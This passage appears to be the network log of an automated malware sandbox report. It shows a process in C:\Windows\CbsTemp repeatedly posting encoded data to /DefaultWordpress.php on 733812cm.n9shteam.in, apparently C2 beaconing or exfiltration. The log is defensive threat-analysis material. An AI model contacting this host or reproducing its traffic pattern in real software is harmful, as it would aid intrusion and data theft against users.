                                                          Data Ascii: [[Y_Z_QVT[RWP_WTP_]]PVWX\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#*.&("?3$0:(,), $+Z&W,'"Z3X%?#F $P.0
                                                          Oct 20, 2024 18:18:44.522319078 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:44.896449089 CEST942INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:44 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xn9E5407jXSJQIPnTNUaGjG%2Fko1Zso8zCvlSADrK6O3gHzjD6AsIPnNIxTucARt77rniZs2OVILAGRXc%2FU%2BFKQeevbZULCWtx%2B%2FM6gZNKwNr5erLyqB1U0eqxomau%2BY5FChXxsMyNg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a5353ba51cf26-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=13112&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2259&delivery_rate=112553&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 39 38 0d 0a 0d 10 26 12 27 01 23 13 28 3f 2b 0b 39 2e 31 1e 2e 5b 28 07 2e 22 3e 07 25 30 2e 15 25 2a 2d 5b 26 0d 37 5b 21 05 3e 5f 23 3f 2a 0c 3a 36 28 5e 07 12 26 13 3d 2c 20 5c 3d 5b 3c 5e 3c 28 28 5f 22 34 27 09 26 2e 2c 0a 24 2d 39 5d 3d 32 31 12 3d 03 00 56 2c 34 08 19 3a 2b 3c 5c 34 00 22 53 03 13 25 11 2b 33 2b 07 35 0b 27 11 3f 13 2b 5f 3c 28 00 5d 3f 33 3f 5d 28 28 09 1d 3b 13 3d 05 24 2f 0a 58 25 3f 20 58 26 03 33 51 27 3a 24 5e 2d 0e 2f 57 04 36 5b 4f 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 98&'#(?+9.1.[(.">%0.%*-[&7[!>_#?*:6(^&=, \=[<^<((_"4'&.,$-9]=21=V,4:+<\4"S%+3+5'?+_<(]?3?]((;=$/X%? X&3Q':$^-/W6[O0
                                                          Oct 20, 2024 18:18:44.905917883 CEST286OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 540
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:45.076777935 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:45.076968908 CEST540OUTData Raw: 5b 5e 5c 5d 5a 5c 51 57 54 5b 52 57 50 5e 57 54 50 51 5d 5f 50 5d 57 5c 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [^\]Z\QWT[RWP^WTPQ]_P]W\\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#*=%8=W< ;089(>X>Y Y0=#22+Z$+.3*Y<#F $P.4
                                                          Oct 20, 2024 18:18:45.460500956 CEST787INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:45 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RMIMaEfi4HFMN7NjElczSZTs4KNcSgoz8ZASEscTRSQfaLJ7qGGIxXcx8izcA%2Ff76d37YoTagdLBS9gbx2Ci8q58QPhLT8iHPWvludxPHdThs1c8c3d%2BTvPLBr4ZGwD8IQP73bc3BA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a535729abcf26-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=13291&sent=8&recv=11&lost=0&retrans=0&sent_bytes=992&recv_bytes=3085&delivery_rate=204361&cwnd=34&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0
                                                          Oct 20, 2024 18:18:45.461051941 CEST322OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=----8D1LOFt4DACq1zbtAcv6ZhD79KhTHwh7CG
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 3182
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:45.626738071 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:45.626910925 CEST3182OUTData Raw: 2d 2d 2d 2d 2d 2d 38 44 31 4c 4f 46 74 34 44 41 43 71 31 7a 62 74 41 63 76 36 5a 68 44 37 39 4b 68 54 48 77 68 37 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
                                                          Data Ascii: ------8D1LOFt4DACq1zbtAcv6ZhD79KhTHwh7CGContent-Disposition: form-data; name="0"Content-Type: text/plain^ZYY_ZQQT[RWP^WRPX]YPWWT\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^
                                                          Oct 20, 2024 18:18:46.030092955 CEST791INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:45 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2HPgCNAJbYIXXkKlNqaxzcHoBTj9EPEntCPAxEuyO0ZTGIgUsBj40bUk2GBB1fRr8yxP0SPSbsarRAMc1oMjnPFwMsCjzjIk3sqk9XQyo293P02f%2F%2B%2FwTeFKH0Xvuug29d7GB6INvA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a535aa99fcf26-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=13169&sent=14&recv=18&lost=0&retrans=0&sent_bytes=1804&recv_bytes=6589&delivery_rate=223267&cwnd=37&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          39192.168.2.549980188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:18:43.998157978 CEST311OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2520
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:18:44.354509115 CEST2520OUTData Raw: 5b 5b 5c 52 5a 59 54 51 54 5b 52 57 50 5a 57 55 50 59 5d 5e 50 51 57 5b 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [[\RZYTQT[RWPZWUPY]^PQW[\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#*Y&]:<3\0:<.](<4'?$"3['20_?:#F $P.
                                                          Oct 20, 2024 18:18:44.777638912 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:45.154947042 CEST785INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:45 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MGbfdapN8JDn4WugG6fNK6j9Yp8oPUzbFE6yQoefR%2BrQ5IUg3r24SOHwIADv2XB4xZuIKdvAPeNsoOTWmF7uypGFXYnjGxe4csXh%2Fq4PsPYxChhA74XDBpn3FtG5pAkc86VijE7WAw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a53555875642f-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11131&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2831&delivery_rate=127734&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          40192.168.2.549986188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:18:45.287992001 CEST287OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:45.635282040 CEST2528OUTData Raw: 5b 51 5c 5f 5a 5c 51 55 54 5b 52 57 50 5e 57 51 50 5d 5d 59 50 56 57 5e 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [Q\_Z\QUT[RWP^WQP]]YPVW^\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ _)%_2!U(3'Z&(1<+><;'-3X2$'+.[0.&Y?#F $P.4
                                                          Oct 20, 2024 18:18:46.116389036 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:46.491411924 CEST785INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:46 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rvT1kg0%2BkmOPZTaaOCb7zm6nM9ns3sbCwwlxsKEICCh8QBIkw9PtGsrsniqApsbpm9zirQTNiJStvAl5lrbfOuvPtBYyGZJVrYZ7ujFYTBJ6Yep0fJKLuFhHvAC%2Brh7vYKU4v32UvA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a535db99dd01d-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=13081&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=112030&cwnd=47&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          41192.168.2.549992188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:18:46.823216915 CEST287OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:47.182265043 CEST2528OUTData Raw: 5b 5c 59 5b 5f 5a 54 50 54 5b 52 57 50 5c 57 51 50 5b 5d 5e 50 56 57 5e 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [\Y[_ZTPT[RWP\WQP[]^PVW^\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#*#$8%W(0 &(?X+(/0$&7_'(%>9):#F $P.<
                                                          Oct 20, 2024 18:18:47.616969109 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:47.843867064 CEST786INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:47 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PJG1luQ7kZVzC%2FHqNHnI0YgENev0%2FzJmWdeuj3XtAzmi7f1qFAtgxdD1gQ6GkiJg6MmacrY1zsBy1lAawceqQ8Zf5HrpTFXKAMhV41l0hv7jGgY7D0wryutq9hFkX68SpGLaDIu3Uw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a5367187f176b-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11382&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=130110&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          42192.168.2.549997188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:18:47.966804981 CEST311OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:18:48.322748899 CEST2528OUTData Raw: 5b 5a 5c 52 5a 5a 51 56 54 5b 52 57 50 53 57 50 50 5c 5d 5e 50 51 57 5b 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [Z\RZZQVT[RWPSWPP\]^PQW[\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#*"189+30)+X+)/&> % '.'=>(*#F $P.
                                                          Oct 20, 2024 18:18:48.769073009 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:49.146791935 CEST789INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:49 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BBwGK4xgohWaXCWwsiOdU3K1bJe0Lni25kQka%2B1ekqvlzXHmLwdsZyharMllQdpMIeEDef94QNi04jZHAorO9b%2Bv6bkjhNDN0rRlL7NpXvlUI5HpgLfdyhM8P1%2FEbU2zdccVUQuPmw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a536e488a1643-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=12720&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2839&delivery_rate=125324&cwnd=41&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          43192.168.2.550004188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:18:49.465164900 CEST311OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:18:49.822726011 CEST2528OUTData Raw: 5b 50 5c 59 5f 58 54 50 54 5b 52 57 50 59 57 5c 50 5b 5d 5f 50 5d 57 5f 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [P\Y_XTPT[RWPYW\P[]_P]W_\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ ^) -X%;W(0(3&?(X=(3-;_%"<%+%$.<*#F $P.(
                                                          Oct 20, 2024 18:18:50.257834911 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:50.484092951 CEST791INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:50 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K0w9exsXsO0EFzG66f2ncR9HNVfYesQ8aPjtDbcXNKO74dK82Q%2ByUOy6ixWvz0%2FVTGGlnKN%2FL5YvErWhtTK1SXFKihESKhroo2hUybuJIqKY2HcO%2BgvZDaxItZTyM0lvlKsT8I%2FlVQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a53779f86fabe-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11660&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2839&delivery_rate=124537&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          44192.168.2.550008188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:18:49.907429934 CEST311OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 1924
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:18:50.260162115 CEST1924OUTData Raw: 5b 51 5c 59 5a 5a 54 50 54 5b 52 57 50 5f 57 55 50 58 5d 56 50 57 57 5c 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [Q\YZZTPT[RWP_WUPX]VPWW\\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#) =1!W< 73(9<.<[><70[;X%!7$&3Y+:#F $P.0
                                                          Oct 20, 2024 18:18:50.708472967 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:50.924787045 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:51.069937944 CEST936INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:50 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HXFV8HXRE3cNuM%2Btw6r3k16H3zOOA4xKwUCRN8OCttFmngNlqRQrWbACY2puhSMFRaD2dRYajjfIwNtA5epwbh7SM21%2FN27%2BkEHRX7auFCWcGh8uXNQvJSryEO0K9Wx6G4ZKuLbU9A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a537a6d121598-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11030&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2235&delivery_rate=131888&cwnd=46&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 39 38 0d 0a 0d 10 26 5a 27 2c 2f 54 29 2c 3b 0f 3a 3e 26 0e 3a 3d 06 04 2c 21 31 17 24 23 31 01 32 2a 00 04 32 33 20 06 21 02 03 02 37 3f 21 53 2e 26 28 5e 07 12 26 1e 28 3f 2f 06 3e 3d 06 5c 2b 06 02 1b 21 19 33 08 25 04 24 0b 27 13 17 58 2a 22 3d 12 28 2d 3e 50 2d 27 3a 19 2d 38 30 58 23 2a 22 53 03 13 25 1e 2a 0e 37 07 23 21 24 02 3f 03 2b 5f 29 38 0c 10 3e 30 23 5c 2b 06 23 5e 38 03 0c 58 27 2c 34 59 24 2f 2b 04 26 2a 01 50 27 3a 24 5e 2d 0e 2f 57 04 36 5b 4f 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 98&Z',/T),;:>&:=,!1$#12*23 !7?!S.&(^&(?/>=\+!3%$'X*"=(->P-':-80X#*"S%*7#!$?+_)8>0#\+#^8X',4Y$/+&*P':$^-/W6[O0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          45192.168.2.550010188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:18:50.614252090 CEST311OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:18:50.963315010 CEST2528OUTData Raw: 5e 5b 59 5f 5a 58 51 55 54 5b 52 57 50 5e 57 5c 50 59 5d 59 50 53 57 5b 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: ^[Y_ZXQUT[RWP^W\PY]YPSW[\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ >3&1;=R>0738U?4>?$$#1"#Y3='.>])*#F $P.4
                                                          Oct 20, 2024 18:18:53.389523029 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:53.625449896 CEST787INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:53 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YeDPQ5mw%2Btre4qZt2ua8nkSIn6jGE653R0Bkh0%2FSyTyLumgBuHBBpQGX7CYB2C1wt4N1L4zYjFVbKKUqUFFiaQFmZWTnPEn7oUNeWbtghADxmUiXiUcG3Gb7zs7jOP%2FShtiQvI4Asg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
